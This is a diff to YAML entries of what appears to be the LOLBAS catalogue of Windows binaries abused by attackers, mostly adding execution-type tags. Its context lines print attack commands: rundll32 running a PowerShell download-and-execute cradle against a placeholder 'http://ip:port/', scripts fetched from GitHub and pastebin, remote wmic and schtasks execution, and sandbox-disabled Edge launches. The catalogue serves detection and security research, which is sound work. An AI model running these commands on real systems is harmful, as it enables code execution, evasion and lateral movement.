- Path: C:\Windows\SysWOW64\regsvr32.exe

21
yml/OSBinaries/Rundll32.yml
View File

@@ -22,13 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute: Remote
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
@@ -36,13 +30,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
@@ -50,6 +39,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
@@ -67,7 +58,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags:
- Execute: DLL
- Execute: COM
Full_Path:
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe

2
yml/OSBinaries/Runexehelper.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\runexehelper.exe
Detection:

2
yml/OSBinaries/Runonce.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe

2
yml/OSBinaries/Runscripthelper.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

4
yml/OSBinaries/Sc.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe

4
yml/OSBinaries/Schtasks.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe

5
yml/OSBinaries/Scriptrunner.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@@ -18,6 +20,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe

2
yml/OSBinaries/Setres.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\setres.exe
Detection:

4
yml/OSBinaries/SettingSyncHost.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe

4
yml/OSBinaries/Ssh.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:

4
yml/OSBinaries/Stordiag.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe

2
yml/OSBinaries/Syncappvpublishingserver.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

4
yml/OSBinaries/Ttdinject.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1909 and below
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe

2
yml/OSBinaries/Tttracer.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID

2
yml/OSBinaries/Unregmp2.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe

4
yml/OSBinaries/Vbc.yml
View File

@@ -11,8 +11,6 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -20,8 +18,6 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe

2
yml/OSBinaries/Verclsid.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: COM
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe

2
yml/OSBinaries/Wab.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe

3
yml/OSBinaries/Winget.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: Local Administrator - required to enable local manifest setting
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

2
yml/OSBinaries/Wlrmdr.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\wlrmdr.exe
Code_Sample:

13
yml/OSBinaries/Wmic.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
@@ -32,6 +39,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system
@@ -40,7 +50,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: XSL
- Execute: Remote
- Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
Description: Copy file from source to destination.
Usecase: Copy file.

2
yml/OSBinaries/WorkFolders.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe
Detection:

4
yml/OSBinaries/Xwizard.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet

2
yml/OSBinaries/msedge_proxy.yml
View File

@@ -27,6 +27,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement:

8
yml/OSBinaries/msedgewebview2.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Low privileges
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection:

2
yml/OSBinaries/wt.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: